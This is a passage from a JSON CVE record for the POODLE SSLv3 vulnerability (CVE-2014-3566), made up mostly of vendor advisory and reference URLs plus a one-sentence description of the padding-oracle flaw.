"http://www.securitytracker.com/id/1031085" }, { "name": "HPSBST03418", "tags": [ "vendor-advisory", "x_refsource_HP", "x_transferred" ], "url": "http://marc.info/?l=bugtraq\u0026m=144251162130364\u0026w=2" }, { "tags": [ "x_refsource_CONFIRM", "x_transferred" ], "url": "http://www.oracle.com/technetwork/security-advisory/cpujul2017-3236622.html" }, { "name": "SSRT101892", "tags": [ "vendor-advisory", "x_refsource_HP", "x_transferred" ], "url": "http://marc.info/?l=bugtraq\u0026m=143039249603103\u0026w=2" }, { "name": "APPLE-SA-2014-10-20-1", "tags": [ "vendor-advisory", "x_refsource_APPLE", "x_transferred" ], "url": "http://www.securityfocus.com/archive/1/533747" }, { "name": "HPSBGN03233", "tags": [ "vendor-advisory", "x_refsource_HP", "x_transferred" ], "url": "http://marc.info/?l=bugtraq\u0026m=142118135300698\u0026w=2" }, { "name": "SSRT101916", "tags": [ "vendor-advisory", "x_refsource_HP", "x_transferred" ], "url": "http://marc.info/?l=bugtraq\u0026m=142624679706236\u0026w=2" }, { "tags": [ "x_refsource_CONFIRM", "x_transferred" ], "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21687611" }, { "tags": [ "x_refsource_MISC", "x_transferred" ], "url": "https://github.com/mpgn/poodle-PoC" }, { "name": "MDVSA-2014:203", "tags": [ "vendor-advisory", "x_refsource_MANDRIVA", "x_transferred" ], "url": "http://www.mandriva.com/security/advisories?name=MDVSA-2014:203" }, { "name": "SSRT101739", "tags": [ "vendor-advisory", "x_refsource_HP", "x_transferred" ], "url": "http://marc.info/?l=bugtraq\u0026m=142118135300698\u0026w=2" }, { "name": "SSRT101968", "tags": [ "vendor-advisory", "x_refsource_HP", "x_transferred" ], "url": "http://marc.info/?l=bugtraq\u0026m=142607790919348\u0026w=2" }, { "tags": [ "x_refsource_MISC", "x_transferred" ], "url": "http://blog.cryptographyengineering.com/2014/10/attack-of-week-poodle.html" }, { "tags": [ "x_refsource_CONFIRM", "x_transferred" ], "url": "https://support.citrix.com/article/CTX216642" }, { "name": "SSRT101899", "tags": [ "vendor-advisory", "x_refsource_HP", "x_transferred" ], "url": "http://marc.info/?l=bugtraq\u0026m=142354438527235\u0026w=2" }, { "tags": [ "x_refsource_CONFIRM", "x_transferred" ], "url": "https://puppet.com/security/cve/poodle-sslv3-vulnerability" }, { "name": "openSUSE-SU-2015:0190", "tags": [ "vendor-advisory", "x_refsource_SUSE", "x_transferred" ], "url": "http://lists.opensuse.org/opensuse-security-announce/2015-02/msg00001.html" }, { "name": "APPLE-SA-2015-01-27-4", "tags": [ "vendor-advisory", "x_refsource_APPLE", "x_transferred" ], "url": "http://lists.apple.com/archives/security-announce/2015/Jan/msg00003.html" }, { "name": "61303", "tags": [ "third-party-advisory", "x_refsource_SECUNIA", "x_transferred" ], "url": "http://secunia.com/advisories/61303" }, { "name": "HPSBGN03252", "tags": [ "vendor-advisory", "x_refsource_HP", "x_transferred" ], "url": "http://marc.info/?l=bugtraq\u0026m=142350743917559\u0026w=2" }, { "name": "HPSBUX03273", "tags": [ "vendor-advisory", "x_refsource_HP", "x_transferred" ], "url": "http://marc.info/?l=bugtraq\u0026m=142496355704097\u0026w=2" }, { "tags": [ "x_refsource_CONFIRM", "x_transferred" ], "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21692299" }, { "name": "1031039", "tags": [ "vdb-entry", "x_refsource_SECTRACK", "x_transferred" ], "url": "http://www.securitytracker.com/id/1031039" }, { "name": "SUSE-SU-2016:1457", "tags": [ "vendor-advisory", "x_refsource_SUSE", "x_transferred" ], "url": "http://lists.opensuse.org/opensuse-security-announce/2016-05/msg00066.html" }, { "tags": [ "x_refsource_CONFIRM", "x_transferred" ], "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21687172" }, { "name": "SSRT101998", "tags": [ "vendor-advisory", "x_refsource_HP", "x_transferred" ], "url": "http://marc.info/?l=bugtraq\u0026m=142721830231196\u0026w=2" }, { "name": "SUSE-SU-2015:0344", "tags": [ "vendor-advisory", "x_refsource_SUSE", "x_transferred" ], "url": "http://lists.opensuse.org/opensuse-security-announce/2015-02/msg00026.html" }, { "name": "SSRT101922", "tags": [ "vendor-advisory", "x_refsource_HP", "x_transferred" ], "url": "http://marc.info/?l=bugtraq\u0026m=142624619906067" }, { "name": "1031089", "tags": [ "vdb-entry", "x_refsource_SECTRACK", "x_transferred" ], "url": "http://www.securitytracker.com/id/1031089" }, { "name": "HPSBGN03253", "tags": [ "vendor-advisory", "x_refsource_HP", "x_transferred" ], "url": "http://marc.info/?l=bugtraq\u0026m=142350196615714\u0026w=2" }, { "name": "HPSBMU03183", "tags": [ "vendor-advisory", "x_refsource_HP", "x_transferred" ], "url": "http://marc.info/?l=bugtraq\u0026m=141628688425177\u0026w=2" }, { "name": "TA14-290A", "tags": [ "third-party-advisory", "x_refsource_CERT", "x_transferred" ], "url": "http://www.us-cert.gov/ncas/alerts/TA14-290A" }, { "name": "FEDORA-2014-13012", "tags": [ "vendor-advisory", "x_refsource_FEDORA", "x_transferred" ], "url": "http://lists.fedoraproject.org/pipermail/package-announce/2014-October/141158.html" }, { "name": "61819", "tags": [ "third-party-advisory", "x_refsource_SECUNIA", "x_transferred" ], "url": "http://secunia.com/advisories/61819" }, { "name": "HPSBGN03255", "tags": [ "vendor-advisory", "x_refsource_HP", "x_transferred" ], "url": "http://marc.info/?l=bugtraq\u0026m=142357976805598\u0026w=2" }, { "name": "1031088", "tags": [ "vdb-entry", "x_refsource_SECTRACK", "x_transferred" ], "url": "http://www.securitytracker.com/id/1031088" }, { "name": "DSA-3147", "tags": [ "vendor-advisory", "x_refsource_DEBIAN", "x_transferred" ], "url": "http://www.debian.org/security/2015/dsa-3147" }, { "name": "61995", "tags": [ "third-party-advisory", "x_refsource_SECUNIA", "x_transferred" ], "url": "http://secunia.com/advisories/61995" }, { "name": "HPSBGN03202", "tags": [ "vendor-advisory", "x_refsource_HP", "x_transferred" ], "url": "http://marc.info/?l=bugtraq\u0026m=141703183219781\u0026w=2" }, { "tags": [ "x_refsource_CONFIRM", "x_transferred" ], "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21686997" }, { "tags": [ "x_refsource_CONFIRM", "x_transferred" ], "url": "https://kc.mcafee.com/corporate/index?page=content\u0026id=SB10090" }, { "name": "SSRT101928", "tags": [ "vendor-advisory", "x_refsource_HP", "x_transferred" ], "url": "http://marc.info/?l=bugtraq\u0026m=142357976805598\u0026w=2" }, { "name": "1031086", "tags": [ "vdb-entry", "x_refsource_SECTRACK", "x_transferred" ], "url": "http://www.securitytracker.com/id/1031086" }, { "name": "HPSBPI03360", "tags": [ "vendor-advisory", "x_refsource_HP", "x_transferred" ], "url": "http://marc.info/?l=bugtraq\u0026m=143558192010071\u0026w=2" }, { "tags": [ "x_refsource_CONFIRM", "x_transferred" ], "url": "http://www.oracle.com/technetwork/topics/security/bulletinoct2015-2511968.html" }, { "name": "RHSA-2014:1692", "tags": [ "vendor-advisory", "x_refsource_REDHAT", "x_transferred" ], "url": "http://rhn.redhat.com/errata/RHSA-2014-1692.html" }, { "name": "FEDORA-2015-9090", "tags": [ "vendor-advisory", "x_refsource_FEDORA", "x_transferred" ], "url": "http://lists.fedoraproject.org/pipermail/package-announce/2015-October/169374.html" }, { "tags": [ "x_refsource_MISC", "x_transferred" ], "url": "https://www.openssl.org/~bodo/ssl-poodle.pdf" }, { "tags": [ "x_refsource_CONFIRM", "x_transferred" ], "url": "http://www-01.ibm.com/support/docview.wss?uid=isg3T1021439" }, { "name": "HPSBPI03107", "tags": [ "vendor-advisory", "x_refsource_HP", "x_transferred" ], "url": "http://marc.info/?l=bugtraq\u0026m=143558137709884\u0026w=2" }, { "name": "[cxf-commits] 20200116 svn commit: r1055336 - in /websites/production/cxf/content: cache/main.pageCache security-advisories.data/CVE-2019-12423.txt.asc security-advisories.data/CVE-2019-17573.txt.asc security-advisories.html", "tags": [ "mailing-list", "x_refsource_MLIST", "x_transferred" ], "url": "https://lists.apache.org/thread.html/rc774278135816e7afc943dc9fc78eb0764f2c84a2b96470a0187315c%40%3Ccommits.cxf.apache.org%3E" }, { "name": "[cxf-commits] 20200319 svn commit: r1058035 - in /websites/production/cxf/content: cache/main.pageCache security-advisories.data/CVE-2019-17573.txt.asc security-advisories.html", "tags": [ "mailing-list", "x_refsource_MLIST", "x_transferred" ], "url": "https://lists.apache.org/thread.html/r36e44ffc1a9b365327df62cdfaabe85b9a5637de102cea07d79b2dbf%40%3Ccommits.cxf.apache.org%3E" }, { "name": "[cxf-commits] 20200401 svn commit: r1058573 - in /websites/production/cxf/content: cache/main.pageCache index.html security-advisories.data/CVE-2020-1954.txt.asc security-advisories.html", "tags": [ "mailing-list", "x_refsource_MLIST", "x_transferred" ], "url": "https://lists.apache.org/thread.html/rff42cfa5e7d75b7c1af0e37589140a8f1999e578a75738740b244bd4%40%3Ccommits.cxf.apache.org%3E" }, { "name": "[cxf-commits] 20201112 svn commit: r1067927 - in /websites/production/cxf/content: cache/main.pageCache security-advisories.data/CVE-2020-13954.txt.asc security-advisories.html", "tags": [ "mailing-list", "x_refsource_MLIST", "x_transferred" ], "url": "https://lists.apache.org/thread.html/rd49aabd984ed540c8ff7916d4d79405f3fa311d2fdbcf9ed307839a6%40%3Ccommits.cxf.apache.org%3E" }, { "name": "[cxf-commits] 20210402 svn commit: r1073270 - in /websites/production/cxf/content: cache/main.pageCache security-advisories.data/CVE-2021-22696.txt.asc security-advisories.html", "tags": [ "mailing-list", "x_refsource_MLIST", "x_transferred" ], "url": "https://lists.apache.org/thread.html/rec7160382badd3ef4ad017a22f64a266c7188b9ba71394f0d321e2d4%40%3Ccommits.cxf.apache.org%3E" }, { "name": "[cxf-commits] 20210616 svn commit: r1075801 - in /websites/production/cxf/content: cache/main.pageCache index.html security-advisories.data/CVE-2021-30468.txt.asc security-advisories.html", "tags": [ "mailing-list", "x_refsource_MLIST", "x_transferred" ], "url": "https://lists.apache.org/thread.html/rfb87e0bf3995e7d560afeed750fac9329ff5f1ad49da365129b7f89e%40%3Ccommits.cxf.apache.org%3E" }, { "tags": [ "x_refsource_MISC", "x_transferred" ], "url": "https://www.arista.com/en/support/advisories-notices/security-advisories/1015-security-advisory-7" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "product": "n/a", "vendor": "n/a", "versions": [ { "status": "affected", "version": "n/a" } ] } ], "datePublic": "2014-10-14T00:00:00", "descriptions": [ { "lang": "en", "value": "The SSL protocol 3.0, as used in OpenSSL through 1.0.1i and other products, uses nondeterministic CBC padding, which makes it easier for man-in-the-middle attackers to obtain cleartext data via a padding-oracle attack, aka the \"POODLE\" issue." } ], "problemTypes": [ { "descriptions": [ { "description": "n/a", "lang": "en", "type": "text" } ] } ], "providerMetadata": { "dateUpdated": "2021-11-05T16:29:26", "orgId": "53f830b8-0a3f-465b-8143-3b8a9948e749", "shortName": "redhat" }, "references": [ { "name": "HPSBOV03227", "tags": [ "vendor-advisory", "x_refsource_HP" ], "url": "http://marc.info/?l=bugtraq\u0026m=142103967620673\u0026w=2" }, { "tags": [ "x_refsource_CONFIRM" ], "url": "http://aix.software.ibm.com/aix/efixes/security/openssl_advisory11.asc" }, { "name": "1031090", "tags": [ "vdb-entry", "x_refsource_SECTRACK" ], "url": "http://www.securitytracker.com/id/1031090" }, { "tags": [ "x_refsource_CONFIRM" ], "url": "http://blog.nodejs.org/2014/10/23/node-v0-10-33-stable/" }, { "name": "RHSA-2014:1880", "tags": [ "vendor-advisory", "x_refsource_REDHAT" ], "url": "http://rhn.redhat.com/errata/RHSA-2014-1880.html" }, { "name": "HPSBHF03300", "tags": [ "vendor-advisory", "x_refsource_HP" ], "url": "http://marc.info/?l=bugtraq\u0026m=142804214608580\u0026w=2" }, { "tags": [ "x_refsource_CONFIRM" ], "url": "https://h20566.www2.hpe.com/portal/site/hpsc/public/kb/docDisplay?docId=emr_na-c04819635" }, { "name": "VU#577193", "tags": [ "third-party-advisory", "x_refsource_CERT-VN" ], "url": "http://www.kb.cert.org/vuls/id/577193" }, { "name": "HPSBMU03184", "tags": [ "vendor-advisory", "x_refsource_HP" ], "url": "http://marc.info/?l=bugtraq\u0026m=141577087123040\u0026w=2" }, { "name": "HPSBGN03209", "tags": [ "vendor-advisory", "x_refsource_HP" ], "url": "http://marc.info/?l=bugtraq\u0026m=141715130023061\u0026w=2" }, { "name": "openSUSE-SU-2014:1331", "tags": [ "vendor-advisory", "x_refsource_SUSE" ], "url": "http://lists.opensuse.org/opensuse-security-announce/2014-10/msg00008.html" }, { "tags": [ "x_refsource_CONFIRM" ], "url": "https://support.apple.com/kb/HT6542" }, { "name": "1031106", "tags": [ "vdb-entry", "x_refsource_SECTRACK" ], "url": "http://www.securitytracker.com/id/1031106" }, { "name": "HPSBGN03201", "tags": [ "vendor-advisory", "x_refsource_HP" ], "url": "http://marc.info/?l=bugtraq\u0026m=141697638231025\u0026w=2" }, { "tags": [ "x_refsource_CONFIRM" ], "url": "http://www.oracle.com/technetwork/topics/security/cpujul2015-2367936.html" }, { "name": "[openssl-dev] 20141014 Patch to mitigate CVE-2014-3566 (\"POODLE\")", "tags": [ "mailing-list", "x_refsource_MLIST" ], "url": "http://marc.info/?l=openssl-dev\u0026m=141333049205629\u0026w=2" }, { "name": "SSRT101898", "tags": [ "vendor-advisory", "x_refsource_HP" ], "url": "http://marc.info/?l=bugtraq\u0026m=142350298616097\u0026w=2" }, { "name": "SSRT101896", "tags": [ "vendor-advisory", "x_refsource_HP" ], "url": "http://marc.info/?l=bugtraq\u0026m=142350743917559\u0026w=2" }, { "name": "60056", "tags": [ "third-party-advisory", "x_refsource_SECUNIA" ], "url": "http://secunia.com/advisories/60056" }, { "name": "RHSA-2014:1877", "tags": [ "vendor-advisory", "x_refsource_REDHAT" ], "url": "http://rhn.redhat.com/errata/RHSA-2014-1877.html" }, { "name": "HPSBUX03162", "tags": [ "vendor-advisory", "x_refsource_HP" ], "url": "http://marc.info/?l=bugtraq\u0026m=141477196830952\u0026w=2" }, { "name": "61130", "tags": [ "third-party-advisory", "x_refsource_SECUNIA" ], "url": "http://secunia.com/advisories/61130" }, { "name": "RHSA-2015:1546", "tags": [ "vendor-advisory", "x_refsource_REDHAT" ], "url": "http://rhn.redhat.com/errata/RHSA-2015-1546.html" }, { "name": "SUSE-SU-2015:0503", "tags": [ "vendor-advisory", "x_refsource_SUSE" ], "url": "http://lists.opensuse.org/opensuse-security-announce/2015-03/msg00018.html" }, { "tags": [ "x_refsource_CONFIRM" ], "url": "https://support.apple.com/kb/HT6529" }, { "tags": [ "x_refsource_CONFIRM" ], "url": "https://www.openssl.org/news/secadv_20141015.txt" }, { "name": "APPLE-SA-2014-10-16-3", "tags": [ "vendor-advisory", "x_refsource_APPLE" ], "url": "http://archives.neohapsis.com/archives/bugtraq/2014-10/0103.html" }, { "tags": [ "x_refsource_CONFIRM" ], "url": "http://www.websense.com/support/article/kbarticle/Vulnerabilities-resolved-in-TRITON-APX-Version-8-0" }, { "name": "RHSA-2014:1920", "tags": [ "vendor-advisory", "x_refsource_REDHAT" ], "url": "http://rhn.redhat.com/errata/RHSA-2014-1920.html" }, { "name": "1031087", "tags": [ "vdb-entry", "x_refsource_SECTRACK" ], "url": "http://www.securitytracker.com/id/1031087" }, { "name": "HPSBMU03234", "tags": [ "vendor-advisory", "x_refsource_HP" ], "url": "http://marc.info/?l=bugtraq\u0026m=143628269912142\u0026w=2" }, { "tags": [ "x_refsource_CONFIRM" ], "url": "https://h20566.www2.hpe.com/portal/site/hpsc/public/kb/docDisplay?docId=emr_na-c05157667" }, { "tags": [ "x_refsource_CONFIRM" ], "url": "https://bto.bluecoat.com/security-advisory/sa83" }, { "name": "SSRT101849", "tags": [ "vendor-advisory", "x_refsource_HP" ], "url": "http://marc.info/?l=bugtraq\u0026m=141879378918327\u0026w=2" }, { "tags": [ "x_refsource_CONFIRM" ], "url": "http://support.citrix.com/article/CTX200238" }, { "name": "61359", "tags": [ "third-party-advisory", "x_refsource_SECUNIA" ], "url": "http://secunia.com/advisories/61359" }, { "tags": [ "x_refsource_CONFIRM" ], "url": "https://support.apple.com/kb/HT6541" }, { "name": "1031093", "tags": [ "vdb-entry", "x_refsource_SECTRACK" ], "url": "http://www.securitytracker.com/id/1031093" }, { "name": "1031132", "tags": [ "vdb-entry", "x_refsource_SECTRACK" ], "url": "http://www.securitytracker.com/id/1031132" }, { "name": "DSA-3144", "tags": [ "vendor-advisory", "x_refsource_DEBIAN" ], "url": "http://www.debian.org/security/2015/dsa-3144" }, { "name": "SSRT101790", "tags": [ "vendor-advisory", "x_refsource_HP" ], "url": "http://marc.info/?l=bugtraq\u0026m=142721887231400\u0026w=2" }, { "name": "DSA-3253", "tags": [ "vendor-advisory", "x_refsource_DEBIAN" ], "url": "http://www.debian.org/security/2015/dsa-3253" }, { "name": "SSRT101846", "tags": [ "vendor-advisory", "x_refsource_HP" ], "url": "http://marc.info/?l=bugtraq\u0026m=142660345230545\u0026w=2" }, { "tags": [ "x_refsource_CONFIRM" ], "url": "http://h20564.www2.hpe.com/hpsc/doc/public/display?docId=emr_na-c04779034" }, { "tags": [ "x_refsource_CONFIRM" ], "url": "https://www.suse.com/support/kb/doc.php?id=7015773" }, { "name": "APPLE-SA-2014-10-16-4", "tags": [ "vendor-advisory", "x_refsource_APPLE" ], "url": "http://www.securityfocus.com/archive/1/533724/100/0/threaded" }, { "tags": [ "x_refsource_CONFIRM" ], "url": "https://www.elastic.co/blog/logstash-1-4-3-released" }, { "name": "SSRT101854", "tags": [ "vendor-advisory", "x_refsource_HP" ], "url": "http://marc.info/?l=bugtraq\u0026m=142296755107581\u0026w=2" }, { "tags": [ "x_refsource_CONFIRM" ], "url": "http://www.oracle.com/technetwork/security-advisory/cpujul2016-2881720.html" }, { "tags": [ "x_refsource_MISC" ], "url": "http://googleonlinesecurity.blogspot.com/2014/10/this-poodle-bites-exploiting-ssl-30.html" }, { "tags": [ "x_refsource_CONFIRM" ], "url": "https://h20566.www2.hpe.com/portal/site/hpsc/public/kb/docDisplay?docId=emr_na-c05301946" }, { "name": "HPSBST03195", "tags": [ "vendor-advisory", "x_refsource_HP" ], "url": "http://marc.info/?l=bugtraq\u0026m=142805027510172\u0026w=2" }, { "name": "61827", "tags": [ "third-party-advisory", "x_refsource_SECUNIA" ], "url": "http://secunia.com/advisories/61827" }, { "name": "HPSBMU03152", "tags": [ "vendor-advisory", "x_refsource_HP" ], "url": "http://marc.info/?l=bugtraq\u0026m=141450452204552\u0026w=2" }, { "name": "RHSA-2015:0079", "tags": [ "vendor-advisory", "x_refsource_REDHAT" ], "url": "http://rhn.redhat.com/errata/RHSA-2015-0079.html" }, { "tags": [ "x_refsource_CONFIRM" ], "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21688283" }, { "name": "HPSBMU03304", "tags": [ "vendor-advisory", "x_refsource_HP" ], "url": "http://marc.info/?l=bugtraq\u0026m=142791032306609\u0026w=2" }, { "tags": [ "x_refsource_CONFIRM" ], "url": "https://technet.microsoft.com/library/security/3009008.aspx" }, { "name": "RHSA-2015:1545", "tags": [ "vendor-advisory", "x_refsource_REDHAT" ], "url": "http://rhn.redhat.com/errata/RHSA-2015-1545.html" }, { "tags": [ "x_refsource_CONFIRM" ], "url": "https://www-01.ibm.com/support/docview.wss?uid=swg21688165" }, { "name": "HPSBMU03259", "tags": [ "vendor-advisory", "x_refsource_HP" ], "url": "http://marc.info/?l=bugtraq\u0026m=142624619906067\u0026w=2" }, { "name": "1031094", "tags": [ "vdb-entry", "x_refsource_SECTRACK" ], "url": "http://www.securitytracker.com/id/1031094" }, { "tags": [ "x_refsource_CONFIRM" ], "url": "http://www.vmware.com/security/advisories/VMSA-2015-0003.html" }, { "name": "61316", "tags": [ "third-party-advisory", "x_refsource_SECUNIA" ], "url": "http://secunia.com/advisories/61316" }, { "name": "GLSA-201606-11", "tags": [ "vendor-advisory", "x_refsource_GENTOO" ], "url": "https://security.gentoo.org/glsa/201606-11" }, { "name": "RHSA-2014:1881", "tags": [ "vendor-advisory", "x_refsource_REDHAT" ], "url": "http://rhn.redhat.com/errata/RHSA-2014-1881.html" }, { "tags": [ "x_refsource_MISC" ], "url": "https://www.imperialviolet.org/2014/10/14/poodle.html" }, { "name": "1031096", "tags": [ "vdb-entry", "x_refsource_SECTRACK" ], "url": "http://www.securitytracker.com/id/1031096" }, { "name": "HPSBHF03275", "tags": [ "vendor-advisory", "x_refsource_HP" ], "url": "http://marc.info/?l=bugtraq\u0026m=142721887231400\u0026w=2" }, { "name": "61810", "tags": [ "third-party-advisory", "x_refsource_SECUNIA" ], "url": "http://secunia.com/advisories/61810" }, { "name": "HPSBHF03293", "tags": [ "vendor-advisory", "x_refsource_HP" ], "url": "http://marc.info/?l=bugtraq\u0026m=142660345230545\u0026w=2" }, { "name": "DSA-3053", "tags": [ "vendor-advisory", "x_refsource_DEBIAN" ], "url": "http://www.debian.org/security/2014/dsa-3053" }, { "name": "HPSBGN03237", "tags": [ "vendor-advisory", "x_refsource_HP" ], "url": "http://marc.info/?l=bugtraq\u0026m=142296755107581\u0026w=2" }, { "tags": [ "x_refsource_CONFIRM" ], "url": "https://support.lenovo.com/us/en/product_security/poodle" }, { "name": "1031107", "tags": [ "vdb-entry", "x_refsource_SECTRACK" ], "url": "http://www.securitytracker.com/id/1031107" }, { "name": "1031095", "tags": [ "vdb-entry", "x_refsource_SECTRACK" ], "url": "http://www.securitytracker.com/id/1031095" }, { "name": "HPSBMU03223", "tags": [ "vendor-advisory", "x_refsource_HP" ], "url": "http://marc.info/?l=bugtraq\u0026m=143290583027876\u0026w=2" }, { "name": "SUSE-SU-2014:1549", "tags": [ "vendor-advisory", "x_refsource_SUSE" ], "url": "http://lists.opensuse.org/opensuse-security-announce/2014-12/msg00002.html" }, { "name": "HPSBGN03305", "tags": [ "vendor-advisory", "x_refsource_HP" ], "url": "http://marc.info/?l=bugtraq\u0026m=142962817202793\u0026w=2" }, { "name": "HPSBUX03194", "tags": [ "vendor-advisory", "x_refsource_HP" ], "url": "http://marc.info/?l=bugtraq\u0026m=143101048219218\u0026w=2" }, { "name": "SSRT101868", "tags": [ "vendor-advisory", "x_refsource_HP" ], "url": "http://marc.info/?l=bugtraq\u0026m=142118135300698\u0026w=2" }, { "name": "1031091", "tags": [ "vdb-entry", "x_refsource_SECTRACK" ], "url": "http://www.securitytracker.com/id/1031091" }, { "name": "HPSBMU03260", "tags": [ "vendor-advisory", "x_refsource_HP" ], "url": "http://marc.info/?l=bugtraq\u0026m=142495837901899\u0026w=2" }, { "name": "1031123", "tags": [ "vdb-entry", "x_refsource_SECTRACK" ], "url": "http://www.securitytracker.com/id/1031123" }, { "tags": [ "x_refsource_MISC" ], "url": "http://askubuntu.com/questions/537196/how-do-i-patch-workaround-sslv3-poodle-vulnerability-cve-2014-3566" }, { "tags": [ "x_refsource_CONFIRM" ], "url": "https://support.apple.com/HT205217" }, { "name": "1031092", "tags": [ "vdb-entry", "x_refsource_SECTRACK" ], "url": "http://www.securitytracker.com/id/1031092" }, { "tags": [ "x_refsource_CONFIRM" ], "url": "http://www.oracle.com/technetwork/topics/security/bulletinjul2015-2511963.html" }, { "name": "SUSE-SU-2015:0376", "tags": [ "vendor-advisory", "x_refsource_SUSE" ], "url": "http://lists.opensuse.org/opensuse-security-announce/2015-02/msg00033.html" }, { "name": "61926", "tags": [ "third-party-advisory", "x_refsource_SECUNIA" ], "url": "http://secunia.com/advisories/61926" }, { "name": "RHSA-2014:1876", "tags": [ "vendor-advisory", "x_refsource_REDHAT" ], "url": "http://rhn.redhat.com/errata/RHSA-2014-1876.html" }, { "name": "SSRT101779", "tags": [ "vendor-advisory", "x_refsource_HP" ], "url": "http://marc.info/?l=bugtraq\u0026m=142103967620673\u0026w=2" }, { "tags": [ "x_refsource_CONFIRM" ], "url": "http://people.canonical.com/~ubuntu-security/cve/2014/CVE-2014-3566.html" }, { "name": "HPSBHF03156", "tags": [ "vendor-advisory", "x_refsource_HP" ], "url": "http://marc.info/?l=bugtraq\u0026m=141450973807288\u0026w=2" }, { "name": "openSUSE-SU-2016:0640", "tags": [ "vendor-advisory", "x_refsource_SUSE" ], "url": "http://lists.opensuse.org/opensuse-security-announce/2016-03/msg00011.html" }, { "tags": [ "x_refsource_CONFIRM" ], "url": "http://docs.ipswitch.com/MOVEit/DMZ82/ReleaseNotes/MOVEitReleaseNotes82.pdf" }, { "tags": [ "x_refsource_CONFIRM" ], "url": "http://www.oracle.com/technetwork/topics/security/cpujan2015-1972971.html" }, { "name": "SSRT101838", "tags": [ "vendor-advisory", "x_refsource_HP" ], "url": "http://marc.info/?l=bugtraq\u0026m=141814011518700\u0026w=2" }, { "name": "HPSBGN03569", "tags": [ "vendor-advisory", "x_refsource_HP" ], "url": "http://marc.info/?l=bugtraq\u0026m=145983526810210\u0026w=2" }, { "name": "APPLE-SA-2015-09-16-2", "tags": [ "vendor-advisory", "x_refsource_APPLE" ], "url": "http://lists.apple.com/archives/security-announce/2015/Sep/msg00002.html" }, { "tags": [ "x_refsource_CONFIRM" ], "url": "https://bugzilla.mozilla.org/show_bug.cgi?id=1076983" }, { "tags": [ "x_refsource_CONFIRM" ], "url": "https://support.apple.com/kb/HT6531" }, { "name": "SUSE-SU-2014:1357", "tags": [ "vendor-advisory", "x_refsource_SUSE" ], "url": "http://lists.opensuse.org/opensuse-security-announce/2014-11/msg00001.html" }, { "tags": [ "x_refsource_CONFIRM" ], "url": "https://devcentral.f5.com/articles/cve-2014-3566-removing-sslv3-from-big-ip" }, { "name": "RHSA-2015:0264", "tags": [ "vendor-advisory", "x_refsource_REDHAT" ], "url": "http://rhn.redhat.com/errata/RHSA-2015-0264.html" }, { "tags": [ "x_refsource_CONFIRM" ], "url": "https://kc.mcafee.com/corporate/index?page=content\u0026id=SB10091" }, { "tags": [ "x_refsource_CONFIRM" ], "url": "https://support.apple.com/kb/HT6527" }, { "tags": [ "x_refsource_CONFIRM" ], "url": "http://www.oracle.com/technetwork/topics/security/cpuapr2015-2365600.html" }, { "name": "SSRT101897", "tags": [ "vendor-advisory", "x_refsource_HP" ], "url": "http://marc.info/?l=bugtraq\u0026m=142350196615714\u0026w=2" }, { "name": "HPSBGN03203", "tags": [ "vendor-advisory", "x_refsource_HP" ], "url": "http://marc.info/?l=bugtraq\u0026m=141697676231104\u0026w=2" }, { "name": "60206", "tags": [ "third-party-advisory", "x_refsource_SECUNIA" ], "url": "http://secunia.com/advisories/60206" }, { "tags": [ "x_refsource_CONFIRM" ], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1152789" }, { "name": "60792", "tags": [ "third-party-advisory", "x_refsource_SECUNIA" ], "url": "http://secunia.com/advisories/60792" }, { "tags": [ "x_refsource_CONFIRM" ], "url": "http://www.oracle.com/technetwork/topics/security/bulletinapr2016-2952098.html" }, { "name": "APPLE-SA-2014-10-16-1", "tags": [ "vendor-advisory", "x_refsource_APPLE" ], "url": "http://archives.neohapsis.com/archives/bugtraq/2014-10/0101.html" }, { "name": "DSA-3489", "tags": [ "vendor-advisory", "x_refsource_DEBIAN" ], "url": "http://www.debian.org/security/2016/dsa-3489" }, { "tags": [ "x_refsource_CONFIRM" ], "url": "https://security.netapp.com/advisory/ntap-20141015-0001/" }, { "name": "1031105", "tags": [ "vdb-entry", "x_refsource_SECTRACK" ], "url": "http://www.securitytracker.com/id/1031105" }, { "tags": [ "x_refsource_CONFIRM" ], "url": "https://www.cloudera.com/documentation/other/security-bulletins/topics/csb_topic_1.html" }, { "name": "FEDORA-2014-13069", "tags": [ "vendor-advisory", "x_refsource_FEDORA" ], "url": "http://lists.fedoraproject.org/pipermail/package-announce/2014-October/141114.html" }, { "name": "1031131", "tags": [ "vdb-entry", "x_refsource_SECTRACK" ], "url": "http://www.securitytracker.com/id/1031131" }, { "name": "HPSBMU03221", "tags": [ "vendor-advisory", "x_refsource_HP" ], "url": "http://marc.info/?l=bugtraq\u0026m=141879378918327\u0026w=2" }, { "name": "USN-2487-1", "tags": [ "vendor-advisory", "x_refsource_UBUNTU" ], "url": "http://www.ubuntu.com/usn/USN-2487-1" }, { "name": "SSRT101795", "tags": [ "vendor-advisory", "x_refsource_HP" ], "url": "http://marc.info/?l=bugtraq\u0026m=142740155824959\u0026w=2" }, { "name": "HPSBGN03222", "tags": [ "vendor-advisory", "x_refsource_HP" ], "url": "http://marc.info/?l=bugtraq\u0026m=141813976718456\u0026w=2" }, { "tags": [ "x_refsource_MISC" ], "url": "https://www.dfranke.us/posts/2014-10-14-how-poodle-happened.html" }, { "name": "1031130", "tags": [ "vdb-entry", "x_refsource_SECTRACK" ], "url": "http://www.securitytracker.com/id/1031130" }, { "name": "HPSBMU03301", "tags": [ "vendor-advisory", "x_refsource_HP" ], "url": "http://marc.info/?l=bugtraq\u0026m=142721830231196\u0026w=2" }, { "name": "HPSBGN03164", "tags": [ "vendor-advisory", "x_refsource_HP" ], "url": "http://marc.info/?l=bugtraq\u0026m=141577350823734\u0026w=2" }, { "name": "RHSA-2014:1948", "tags": [ "vendor-advisory", "x_refsource_REDHAT" ], "url": "http://rhn.redhat.com/errata/RHSA-2014-1948.html" }, { "name": "NetBSD-SA2014-015", "tags": [ "vendor-advisory", "x_refsource_NETBSD" ], "url": "ftp://ftp.netbsd.org/pub/NetBSD/security/advisories/NetBSD-SA2014-015.txt.asc" }, { "name": "HPSBGN03192", "tags": [ "vendor-advisory", "x_refsource_HP" ], "url": "http://marc.info/?l=bugtraq\u0026m=141620103726640\u0026w=2" }, { "name": "RHSA-2014:1653", "tags": [ "vendor-advisory", "x_refsource_REDHAT" ], "url": "http://rhn.redhat.com/errata/RHSA-2014-1653.html" }, { "name": 